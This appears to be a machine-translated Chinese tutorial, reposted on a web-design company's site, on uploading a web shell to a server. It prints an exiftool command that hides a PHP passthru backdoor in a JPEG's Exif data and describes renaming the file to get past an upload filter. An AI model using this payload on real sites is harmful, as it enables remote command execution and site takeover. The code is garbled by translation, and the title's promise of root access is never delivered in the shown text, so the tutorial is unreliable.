Shell如何上载到Web服务器并获得Root
这篇文章主要介绍Shell如何上载到Web服务器并获得Root,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!
专注于为中小企业提供成都网站建设、成都网站设计服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业沂南免费做网站提供优质的服务。我们立足成都,凝聚了一批互联网行业人才,有力地推动了近1000家企业的稳健成长,帮助中小企业通过网站建设实现规模扩充和转变。
要求
本教程的这一部分将需要Nmap。
步骤1:扫描服务器
对于本教程,我在网络上设置了易受攻击的服务器。让我们来扫描一下。
Nmap找到了两个开放端口:80和22,因此我们知道服务器同时具有HTTP和SSH服务。让我们访问该网页...
第2步:上传尝试
让我们查看上传页面...
该表格告诉我们该文件必须是.jpeg,.jpg或.png文件。但是,以防万一,我们将尝试上传恶意的PHP文件。
真是的 它不会上传。但是,如果我们将恶意代码添加到图片文件的Exif数据中怎么办?
步骤3:将图片后门
为了上传我们的外壳,我们需要使用合法的图片文件。为了使我们的代码运行,我们需要将PHP代码添加到Exif数据中。输入此命令:
exiftool -Comment =“ <?php passthru(\ $ _ GET'cmd'); _halt_compiler();” /root/picture.jpeg
在\ $ _ GET'cmd'); 代码是读取我们的命令的内容,而_halt_compiler(); 防止文件检查系统继续读取二进制数据。
现在,让我们运行命令的PHP代码被添加到注释中。将文件重命名为picture.php.jpeg,以便强制网站处理PHP代码。
步骤4:再试一次
现在,让我们上传后门文件。
是! 有效!现在,我们可以使用命令通过Web浏览器对其进行控制。
以上是“Shell如何上载到Web服务器并获得Root”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注创新互联行业资讯频道!
网页名称:Shell如何上载到Web服务器并获得Root
文章转载:http://scyanting.com/article/jspgic.html